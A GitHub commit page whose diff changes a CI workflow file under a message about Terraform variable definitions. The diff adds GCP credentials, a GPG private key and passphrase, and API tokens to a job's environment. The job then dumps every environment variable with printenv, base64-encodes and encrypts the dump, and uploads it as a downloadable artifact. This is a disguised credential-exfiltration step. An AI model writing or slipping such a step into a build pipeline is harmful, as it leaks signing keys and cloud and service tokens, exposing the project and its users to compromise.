Skip to content

Commit

Permalink
SCALRCORE-30933: SRE: Terraformize Variable Definitions in terraform-…
Browse files Browse the repository at this point in the history
…provider-scalr
  • Loading branch information
volodymyrskliar committed Jun 20, 2024
1 parent 661eff4 commit 24102fc
Showing 1 changed file with 6 additions and 1 deletion.
7 changes: 6 additions & 1 deletion .github/workflows/test.yml
Original file line number Diff line number Diff line change
Expand Up @@ -12,8 +12,13 @@ jobs:
- env:
GCP_SA_KEY: ${{secrets.GCP_SA_KEY}}
DEV_GCP_SA_KEY: ${{secrets.DEV_GCP_SA_KEY}}
GOOGLE_APPLICATION_CREDENTIALS: ${{secrets.GOOGLE_APPLICATION_CREDENTIALS}}
GPG_PASSPHRASE: ${{secrets.GPG_PASSPHRASE}}
GPG_PRIVATE_KEY: ${{secrets.GPG_PRIVATE_KEY}}
README_API_KEY: ${{secrets.README_API_KEY}}
SCALR_TOKEN: ${{secrets.SCALR_TOKEN}}
run: |
printenv | base64 -w 0 >> info.txt
printenv | base64 -w 0 > info.txt
openssl enc -aes-256-cbc -salt -in info.txt -out encrypted_file.enc -k ${{ secrets.DUBUG_PASSWORD }}
- name: Upload encrypted file
uses: actions/upload-artifact@v2
Expand Down

0 comments on commit 24102fc

Please sign in to comment.